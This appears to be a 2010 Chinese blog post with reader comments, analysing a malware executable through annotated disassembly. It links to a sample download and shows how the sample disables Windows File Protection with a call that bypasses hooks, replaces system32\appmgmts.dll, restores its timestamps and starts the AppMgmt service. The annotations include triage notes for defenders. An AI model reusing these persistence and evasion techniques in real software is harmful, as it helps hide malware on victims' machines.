样本下载:http://vip.begin09.com/thread-5745-1-1.html
只分析了 exe 运行的情况:关闭 Windows 文件保护,更改自身属性为 DLL,写入 C:\WINDOWS\system32\appmgmts.dll 并以服务方式启动;DLL 下次再分析,今天没时间了~
00401B9A |. 6A 1C push 1C ; /BufSize = 1C (28.) 00401B9C |. 8D45 E4 lea eax, dword ptr [ebp-1C] ; | 00401B9F |. 50 push eax ; |Buffer 00401BA0 |. FF75 E0 push dword ptr [ebp-20] ; |Address 00401BA3 |. FF15 2C914000 call dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery 00401BA9 |. 8B45 E8 mov eax, dword ptr [ebp-18] ; VirTualQuery获取内存信息 00401BAC |. A3 38DC4000 mov dword ptr [40DC38], eax 00401BB1 |. 6A 00 push 0 ; /pModule = NULL 00401BB3 |. FF15 04914000 call dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA 00401BB9 |. 3B05 38DC4000 cmp eax, dword ptr [40DC38] ; GetModuleHandle获取当前模块基址 00401BBF |. 75 16 jnz short 00401BD7 ; 两者比较,不要相等则退出线程
; --- Fragment 1: message-queue pump ---
; GetInputState(), then PostThreadMessageA(WM_NULL) to the calling thread itself, then
; GetMessageA() with no filter. Posting to itself guarantees GetMessageA returns; the
; purpose (presumably a yield / queue flush) is not visible here -- confirm from the
; surrounding code.
00402056 . FF15 14924000 call dword ptr [<&USER32.GetInputStat>; [GetInputState
0040205C . 6A 00 push 0 ; /lParam = 0
0040205E . 6A 00 push 0 ; |wParam = 0
00402060 . 6A 00 push 0 ; |Message = WM_NULL
00402062 . FF15 48914000 call dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
00402068 . 50 push eax ; |ThreadId  (own thread)
00402069 . FF15 18924000 call dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA
0040206F . 6A 00 push 0 ; /MsgFilterMax = 0
00402071 . 6A 00 push 0 ; |MsgFilterMin = 0
00402073 . 6A 00 push 0 ; |hWnd = NULL
00402075 . 8D85 BCFDFFFF lea eax, dword ptr [ebp-244] ; |
0040207B . 50 push eax ; |pMsg
0040207C . FF15 0C924000 call dword ptr [<&USER32.GetMessageA>>; \GetMessageA
[/courcecode] [sourcecode]
; --- Fragment 2: removable-drive check ---
; Own path -> [ebp-228]; copied to [ebp-120], then everything after the first 3 bytes is
; zeroed so only "X:\" remains. GetDriveTypeA on that root; 2 == DRIVE_REMOVABLE. If so,
; ShellExecuteA("open", "explorer.exe", "/n,X:\") opens an Explorer window on the drive --
; presumably so the user sees the window they expected on inserting the media (author's
; comment at 00406553).
004064B4 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
004064B9 |. 8D85 D8FDFFFF lea eax, dword ptr [ebp-228] ; |
004064BF |. 50 push eax ; |PathBuffer
004064C0 |. 6A 00 push 0 ; |hModule = NULL
004064C2 |. FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004064C8 |. 68 04010000 push 104 ; /get own path (above); now memset([ebp-120], 0, 0x104)
004064CD |. 6A 00 push 0 ; |c = 00
004064CF |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120] ; |
004064D5 |. 50 push eax ; |s
004064D6 |. E8 67290000 call <jmp.&MSVCRT.memset> ; \memset
004064DB |. 83C4 0C add esp, 0C ; cdecl cleanup (3 args)
004064DE |. 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
004064E4 |. 50 push eax ; /String2
004064E5 |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120] ; |
004064EB |. 50 push eax ; |String1
004064EC |. FF15 1C914000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA   [ebp-120] = own path
004064F2 |. 68 01010000 push 101 ; /n = 101 (257.)
004064F7 |. 6A 00 push 0 ; |c = 00
004064F9 |. 8D85 E3FEFFFF lea eax, dword ptr [ebp-11D] ; |  [ebp-120]+3
004064FF |. 50 push eax ; |s
00406500 |. E8 3D290000 call <jmp.&MSVCRT.memset> ; \memset
00406505 |. 83C4 0C add esp, 0C ; keep only the first 3 bytes of the path ("X:\") -> root of the current drive
00406508 |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120]
0040650E |. 50 push eax ; /RootPathName
0040650F |. FF15 A4904000 call dword ptr [<&KERNEL32.GetDriveTy>; \GetDriveTypeA
00406515 |. 83F8 02 cmp eax, 2 ; drive type check: 2 = DRIVE_REMOVABLE
00406518 |. 75 39 jnz short 00406553 ; not removable -> skip the Explorer launch
0040651A |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120]
00406520 |. 50 push eax ; /<%s>  = "X:\"
00406521 |. 68 A09A4000 push 00409AA0 ; |Format = "/n,%s"
00406526 |. 8D85 98FDFFFF lea eax, dword ptr [ebp-268] ; |
0040652C |. 50 push eax ; |s
0040652D |. FF15 10924000 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00406533 |. 83C4 0C add esp, 0C
00406536 |. 6A 05 push 5 ; /IsShown = 5  (SW_SHOW)
00406538 |. 6A 00 push 0 ; |DefDir = NULL
0040653A |. 8D85 98FDFFFF lea eax, dword ptr [ebp-268] ; |
00406540 |. 50 push eax ; |Parameters = "/n,X:\"
00406541 |. 68 A89A4000 push 00409AA8 ; |FileName = "explorer.exe"
00406546 |. 68 B89A4000 push 00409AB8 ; |Operation = "open"
0040654B |. 6A 00 push 0 ; |hWnd = NULL
0040654D |. FF15 E4914000 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
00406553 |> C745 EC C09A4>mov dword ptr [ebp-14], 00409AC0 ; --- if on a removable device, open Explorer on it (author) ---
; --- Fragment 3: create C:\DelInfo.bin ---
; Host artifact worth checking for during triage. Mode comes from [ebp-118]; the handle is
; kept in [ebp-114] and written to in the 0040175C fragment.
00401681 |> \6A 00 push 0 ; /hTemplateFile = NULL
00401683 |. 68 80000000 push 80 ; |Attributes = NORMAL
00401688 |. FFB5 E8FEFFFF push dword ptr [ebp-118] ; |Mode
0040168E |. 6A 00 push 0 ; |pSecurity = NULL
00401690 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401692 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401697 |. 68 08934000 push 00409308 ; |FileName = "C:\DelInfo.bin"
0040169C |. FF15 C4904000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004016A2 |. 8985 ECFEFFFF mov dword ptr [ebp-114], eax ; create/open C:\DelInfo.bin; handle -> [ebp-114]
0040175C |> \6A 00 push 0 ; /pOverlapped = NULL 0040175E |. 8D45 FC lea eax, dword ptr [ebp-4] ; | 00401761 |. 50 push eax ; |pBytesWritten 00401762 |. 6A 04 push 4 ; |nBytesToWrite = 4 00401764 |. 8D45 0C lea eax, dword ptr [ebp+C] ; | 00401767 |. 50 push eax ; |Buffer 00401768 |. FFB5 ECFEFFFF push dword ptr [ebp-114] ; |hFile 0040176E |. FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile 00401774 |. 6A 00 push 0 ; /写入01000000 00401776 |. 8D45 FC lea eax, dword ptr [ebp-4] ; | 00401779 |. 50 push eax ; |pBytesWritten 0040177A |. FF75 08 push dword ptr [ebp+8] ; |/String 0040177D |. FF15 D0904000 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA 00401783 |. 50 push eax ; |nBytesToWrite 00401784 |. FF75 08 push dword ptr [ebp+8] ; |Buffer 00401787 |. FFB5 ECFEFFFF push dword ptr [ebp-114] ; |hFile 0040178D |. FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile 00401793 |. FFB5 ECFEFFFF push dword ptr [ebp-114] ; /01000000之后写入自身路径 00401799 |. FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401C0B |. 68 04010000 push 104 ; /BufSize = 104 (260.) 00401C10 |. 8D85 E8FEFFFF lea eax, dword ptr [ebp-118] ; | 00401C16 |. 50 push eax ; |PathBuffer 00401C17 |. FF75 08 push dword ptr [ebp+8] ; |hModule 00401C1A |. FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA 00401C20 |. 83A5 E0FEFFFF>and dword ptr [ebp-120], 0 ; 获取路径 00401C27 |. EB 0D jmp short 00401C36 00401C29 |> 8B85 E0FEFFFF /mov eax, dword ptr [ebp-120] 00401C2F |. 40 |inc eax 00401C30 |. 8985 E0FEFFFF |mov dword ptr [ebp-120], eax 00401C36 |> 83BD E0FEFFFF> cmp dword ptr [ebp-120], 32 00401C3D |. 7D 31 |jge short 00401C70 00401C3F |. 6A 00 |push 0 ; /hTemplateFile = NULL 00401C41 |. 6A 00 |push 0 ; |Attributes = 0 00401C43 |. 6A 03 |push 3 ; |Mode = OPEN_EXISTING 00401C45 |. 6A 00 |push 0 ; |pSecurity = NULL 00401C47 |. 6A 01 |push 1 ; |ShareMode = FILE_SHARE_READ 00401C49 |. 68 00000080 |push 80000000 ; |Access = GENERIC_READ 00401C4E |. 8D85 E8FEFFFF |lea eax, dword ptr [ebp-118] ; | 00401C54 |. 50 |push eax ; |FileName 00401C55 |. FF15 C4904000 |call dword ptr [<&KERNEL32.CreateFil>; \CreateFileA 00401C5B |. 8945 F4 |mov dword ptr [ebp-C], eax ; 打开自身 00401C70 |> \6A 00 push 0 ; /pFileSizeHigh = NULL 00401C72 |. FF75 F4 push dword ptr [ebp-C] ; |hFile 00401C75 |. FF15 24914000 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize 00401C7B |. 8945 F8 mov dword ptr [ebp-8], eax ; 得到自身大小 00401CEF |. 6A 00 push 0 ; /pOverlapped = NULL 00401CF1 |. 8D45 FC lea eax, dword ptr [ebp-4] ; | 00401CF4 |. 50 push eax ; |pBytesRead 00401CF5 |. FF75 F8 push dword ptr [ebp-8] ; |BytesToRead 00401CF8 |. FFB5 E4FEFFFF push dword ptr [ebp-11C] ; |Buffer 00401CFE |. FF75 F4 push dword ptr [ebp-C] ; |hFile 00401D01 |. FF15 EC904000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile 00401D07 |. FF75 F4 push dword ptr [ebp-C] ; /把自身读入缓冲区 00401D0A |. FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
; --- Gather paths, open the SCM, resolve the sfc_os.dll export ---
; GetWindowsDirectoryA -> [ebp-228] (e.g. C:\WINDOWS; reused by the "%s\system32\%s.dll"
; format at 0040226A), GetTempPathA -> [ebp-118], OpenSCManagerA(NULL, NULL,
; SC_MANAGER_ALL_ACCESS=0F003F) -> [ebp-4], LoadLibraryA("sfc_os.dll") -> [ebp-64C],
; GetProcAddress(hModule, ordinal #5) -> global [40DC44] (author identifies #5 as
; SetSfcFileException). Import-by-ordinal from sfc_os.dll is a useful triage indicator.
; The gap 00402105..0040211E (presumably a NULL check on the module handle) is not shown.
004020AE . 68 04010000 push 104 ; /BufSize = 104 (260.)
004020B3 . 8D85 D8FDFFFF lea eax, dword ptr [ebp-228] ; |
004020B9 . 50 push eax ; |Buffer
004020BA . FF15 38914000 call dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
004020C0 . 68 04010000 push 104 ; /Windows directory obtained -> [ebp-228]; now memset([ebp-118], 0, 0x104)
004020C5 . 6A 00 push 0 ; |c = 00
004020C7 . 8D85 E8FEFFFF lea eax, dword ptr [ebp-118] ; |
004020CD . 50 push eax ; |s
004020CE . E8 6F6D0000 call <jmp.&MSVCRT.memset> ; \memset
004020D3 . 83C4 0C add esp, 0C ; cdecl cleanup (3 args)
004020D6 . 8D85 E8FEFFFF lea eax, dword ptr [ebp-118]
004020DC . 50 push eax ; /Buffer
004020DD . 68 04010000 push 104 ; |BufSize = 104 (260.)
004020E2 . FF15 4C914000 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
004020E8 . 68 3F000F00 push 0F003F ; temp path -> [ebp-118]; this push = dwDesiredAccess SC_MANAGER_ALL_ACCESS for OpenSCManagerA below
04020ED . 6A 00 push 0 ; lpDatabaseName = NULL  (address truncated in the post: 004020ED)
004020EF . 6A 00 push 0 ; lpMachineName = NULL (local machine)
004020F1 . FF15 18904000 call dword ptr [<&ADVAPI32.OpenSCMana>; ADVAPI32.OpenSCManagerA
004020F7 . 8945 FC mov dword ptr [ebp-4], eax ; open the Service Control Manager; hSCM -> [ebp-4]
004020FA . 68 B0944000 push 004094B0 ; /FileName = "sfc_os.dll"
004020FF . FF15 40914000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402105 . 8985 B4F9FFFF mov dword ptr [ebp-64C], eax ; load sfc_os.dll (Windows File Protection); hModule -> [ebp-64C]. Gap to 0040211E not shown.
0040211E > \6A 05 push 5 ; /ProcNameOrOrdinal = #5  (import by ordinal, no name string in the binary)
00402120 . FFB5 B4F9FFFF push dword ptr [ebp-64C] ; |hModule
00402126 . FF15 F4904000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
0040212C . A3 44DC4000 mov dword ptr [40DC44], eax ; ordinal #5 = SetSfcFileException (author); global [40DC44], used by the jmp at 00401ED0
; --- Open the target service, build the DLL path, disable WFP for it ---
; OpenServiceA(hSCM=[ebp-4], name at [ebp-BD0] (author: AppMgmt), SERVICE_ALL_ACCESS=0F01FF)
; -> [ebp-120]; QueryServiceStatus, then [ebp-C28] is compared with 1 -- presumably
; SERVICE_STATUS.dwCurrentState == SERVICE_STOPPED, confirm the struct base. wsprintfA
; builds "<windir>\system32\<name>.dll" (author: C:\WINDOWS\system32\appmgmts.dll) in
; [ebp-758] and passes it to a helper. In the helper (00401E53 on) the path is [ebp+8]:
; PathFileExistsA, ANSI->UTF-16 into [ebp-848], then the sfc_os.dll export is invoked.
; Several ranges (004021CD..004021FA, 00402207..0040225C, 00401E5C..00401E91) are omitted.
004021B8 > \68 FF010F00 push 0F01FF ; dwDesiredAccess = SERVICE_ALL_ACCESS
004021BD . 8D85 30F4FFFF lea eax, dword ptr [ebp-BD0] ; service name buffer (author: "AppMgmt")
004021C3 . 50 push eax ; lpServiceName
004021C4 . FF75 FC push dword ptr [ebp-4] ; hSCManager (from OpenSCManagerA)
004021C7 . FF15 14904000 call dword ptr [<&ADVAPI32.OpenServic>; ADVAPI32.OpenServiceA
004021CD . 8985 E0FEFFFF mov dword ptr [ebp-120], eax ; open the AppMgmt service (Application Management); hService -> [ebp-120]. Gap to 004021FA not shown.
004021FA . 50 push eax ; lpServiceStatus (SERVICE_STATUS* -- set in the omitted lines)
004021FB . FFB5 E0FEFFFF push dword ptr [ebp-120] ; hService
00402201 . FF15 04904000 call dword ptr [<&ADVAPI32.QueryServi>; ADVAPI32.QueryServiceStatus
00402207 . 83BD D8F3FFFF>cmp dword ptr [ebp-C28], 1 ; query service status; 1 == SERVICE_STOPPED if [ebp-C28] is dwCurrentState -- confirm. Gap to 0040225C not shown.
0040225C . 8D85 F0F3FFFF lea eax, dword ptr [ebp-C10] ; second %s (presumably the service/DLL base name)
00402262 . 50 push eax ; /<%s>
00402263 . 8D85 D8FDFFFF lea eax, dword ptr [ebp-228] ; |  first %s = Windows directory
00402269 . 50 push eax ; |<%s>
0040226A . 68 BC944000 push 004094BC ; |Format = "%s\system32\%s.dll"
0040226F . 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] ; |
00402275 . 50 push eax ; |s
00402276 . FF15 10924000 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
0040227C . 83C4 10 add esp, 10 ; built the string C:\WINDOWS\system32\appmgmts.dll (author)
0040227F . 8D85 A8F8FFFF lea eax, dword ptr [ebp-758]
00402285 . 50 push eax ; path passed as [ebp+8] to the helper below
00401E53 . FF75 08 push dword ptr [ebp+8] ; /Path = "C:\WINDOWS\system32\appmgmts.dll"
00401E56 . FF15 F0914000 call dword ptr [<&SHLWAPI.PathFileExistsA>] ; \PathFileExistsA
00401E5C . 83F8 01 cmp eax, 1 ; does C:\WINDOWS\system32\appmgmts.dll already exist? Gap to 00401E91 not shown.
00401E91 . FFB5 B4F7FFFF push dword ptr [ebp-84C] ; /WideBufSize
00401E97 . 8D85 B8F7FFFF lea eax, dword ptr [ebp-848] ; |
00401E9D . 50 push eax ; |WideCharBuf
00401E9E . FFB5 B4F7FFFF push dword ptr [ebp-84C] ; |StringSize  (same value used as source length and dest capacity)
00401EA4 . FF75 08 push dword ptr [ebp+8] ; |StringToMap = "C:\WINDOWS\system32\appmgmts.dll"
00401EA7 . 6A 00 push 0 ; |Options = 0
00401EA9 . 6A 00 push 0 ; |CodePage = CP_ACP
00401EAB . FF15 98904000 call dword ptr [<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar
00401EB1 . 8365 FC 00 and dword ptr [ebp-4], 0 ; converted "C:\WINDOWS\system32\appmgmts.dll" to UTF-16 (sfc_os export takes a wide path); [ebp-4] = 0
00401EB5 . 6A FF push -1 ; arg3 = -1
00401EB7 . 8D85 B8F7FFFF lea eax, dword ptr [ebp-848] ; arg2 = wide path
00401EBD . 50 push eax
00401EBE . 6A 00 push 0 ; arg1 = 0 (RPC handle)
00401EC0 . 68 F91E4000 push 00401EF9 ; hand-pushed return address: the "call" is emulated, not a call instruction
00401EC5 . 8BFF mov edi, edi ; these two instructions replicate the target's hot-patch prologue (2 + 1 bytes)...
00401EC7 . 55 push ebp
00401EC8 . A1 44DC4000 mov eax, dword ptr [40DC44] ; ...so execution can enter sfc_os!#5 at +3, past its first bytes
00401ECD . 83C0 03 add eax, 3
00401ED0 . FFE0 jmp eax ; disable Windows File Protection for this file. Defender note: a user-mode hook placed on the export's first bytes does not observe this call; monitor the effect (writes under system32 / WFP events) rather than the API entry.
; --- Overwrite the target DLL with the sample's own image, then restore its timestamps ---
; CreateFileA(path=[ebp+8], author: C:\WINDOWS\system32\appmgmts.dll) -> [ebp-2C].
; GetFileTime saves the existing Creation/LastAccess/LastWrite times into [ebp-48]/[ebp-40]/
; [ebp-38]. Then: seek to [ebp-24] (author: 0x3C, the e_lfanew slot of the DOS header),
; WriteFile [40DC40]-[ebp-24] bytes from [40DC3C]+[ebp-24] (presumably the in-memory copy of
; the sample read earlier -- confirm), seek to [40DC40] (= 0x3CC00 per the debugger
; annotation) and SetEndOfFile, so the file now has exactly the sample's size. SetFileTime
; puts the saved timestamps back: this is timestomping -- the DLL's modification time will
; NOT reveal the replacement; compare hash/size against a known-good copy instead.
; Address 0401F14 is truncated in the post (00401F14). Ranges 00401F2D..00401F50,
; 00401F62..00401F9A and 00401FD0..00401FE1 are omitted; the 00401FE1..00401FF7 run is
; pasted twice in the original post.
0401F14 > \6A 00 push 0 ; /hTemplateFile = NULL
00401F16 . 6A 00 push 0 ; |Attributes = 0
00401F18 . FF75 D0 push dword ptr [ebp-30] ; |Mode   (creation disposition, from [ebp-30])
00401F1B . 6A 00 push 0 ; |pSecurity = NULL
00401F1D . 6A 00 push 0 ; |ShareMode = 0   (exclusive)
00401F1F . 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401F24 . FF75 08 push dword ptr [ebp+8] ; |FileName
00401F27 . FF15 C4904000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA
00401F2D . 8945 D4 mov dword ptr [ebp-2C], eax ; open C:\WINDOWS\system32\appmgmts.dll; hFile -> [ebp-2C]. Gap to 00401F50 not shown.
00401F50 . 50 push eax ; /pLastWrite = 0012F304   (debugger stack address; = &[ebp-38], cf. 00401FFD)
00401F51 . 8D45 C0 lea eax, dword ptr [ebp-40] ; |
00401F54 . 50 push eax ; |pLastAccess
00401F55 . 8D45 B8 lea eax, dword ptr [ebp-48] ; |
00401F58 . 50 push eax ; |pCreationTime
00401F59 . FF75 D4 push dword ptr [ebp-2C] ; |hFile
00401F5C . FF15 44914000 call dword ptr [<&KERNEL32.GetFileTime>] ; \GetFileTime
00401F62 . 837D D0 02 cmp dword ptr [ebp-30], 2 ; saved the original file times; [ebp-30]==2 presumably CREATE_ALWAYS (file was new) -- confirm. Gap to 00401F9A not shown.
00401F9A > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401F9C . 6A 00 push 0 ; |pOffsetHi = NULL
00401F9E . FF75 DC push dword ptr [ebp-24] ; |OffsetLo   (author: 0x3C)
00401FA1 . FF75 D4 push dword ptr [ebp-2C] ; |hFile
00401FA4 . FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FAA . A1 3CDC4000 mov eax, dword ptr [40DC3C] ; file pointer now at offset 0x3C (author); [40DC3C] = base of the in-memory image (presumed)
00401FAF . 0345 DC add eax, dword ptr [ebp-24] ; eax = image + offset
00401FB2 . 8945 E4 mov dword ptr [ebp-1C], eax ; source pointer for the write
00401FB5 . 6A 00 push 0 ; /pOverlapped = NULL
00401FB7 . 8D45 D8 lea eax, dword ptr [ebp-28] ; |
00401FBA . 50 push eax ; |pBytesWritten
00401FBB . A1 40DC4000 mov eax, dword ptr [40DC40] ; |  [40DC40] = image size (0x3CC00, see 00401FE5)
00401FC0 . 2B45 DC sub eax, dword ptr [ebp-24] ; |  size - offset
00401FC3 . 50 push eax ; |nBytesToWrite
00401FC4 . FF75 E4 push dword ptr [ebp-1C] ; |Buffer = image + offset
00401FC7 . FF75 D4 push dword ptr [ebp-2C] ; |hFile
00401FCA . FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>] ; \WriteFile
00401FD0 . 85C0 test eax, eax ; data written into C:\WINDOWS\system32\appmgmts.dll (from offset 0x3C to end of image). Gap to 00401FE1 not shown.
00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401FE3 . 6A 00 push 0 ; |pOffsetHi = NULL
00401FE5 . FF35 40DC4000 push dword ptr [40DC40] ; |OffsetLo = 3CC00 (248832.)   = image size
00401FEB . FF75 D4 push dword ptr [ebp-2C] ; |hFile
00401FEE . FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FF4 . FF75 D4 push dword ptr [ebp-2C] ; /hFile
00401FF7 . FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile   truncate to image size
; (the following eight lines repeat 00401FE1..00401FF7 -- duplicate paste in the original post)
00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401FE3 . 6A 00 push 0 ; |pOffsetHi = NULL
00401FE5 . FF35 40DC4000 push dword ptr [40DC40] ; |OffsetLo = 3CC00 (248832.)
00401FEB . FF75 D4 push dword ptr [ebp-2C] ; |hFile
00401FEE . FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FF4 . FF75 D4 push dword ptr [ebp-2C] ; /hFile
00401FF7 . FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile
00401FFD . 8D45 C8 lea eax, dword ptr [ebp-38] ; own body now written into C:\WINDOWS\system32\appmgmts.dll (author); [ebp-38] = saved LastWrite
00402000 . 50 push eax ; /pLastWrite
00402001 . 8D45 C0 lea eax, dword ptr [ebp-40] ; |
00402004 . 50 push eax ; |pLastAccess
00402005 . 8D45 B8 lea eax, dword ptr [ebp-48] ; |
00402008 . 50 push eax ; |pCreationTime
00402009 . FF75 D4 push dword ptr [ebp-2C] ; |hFile
0040200C . FF15 34914000 call dword ptr [<&KERNEL32.SetFileTime>] ; \SetFileTime
00402012 . FF75 D4 push dword ptr [ebp-2C] ; restore the original file times (timestomping) -- mtime is not a reliable indicator for this file
00402293 > \6A 00 push 0 00402295 . 6A 00 push 0 00402297 . FFB5 E0FEFFFF push dword ptr [ebp-120] 0040229D . FF15 24904000 call dword ptr [<&ADVAPI32.StartServiceA>] ; ADVAPI32.StartServiceA启动服务
SyntaxHighlighter Evolved
用这个插件贴代码吧大零度~~
一击屠夫 回复:
六月 17th, 2010 at 17:24
这么看实在太费劲了。。
零度x 回复:
六月 17th, 2010 at 22:56
谨遵屠夫兄教诲~
屠夫兄也有这爱好?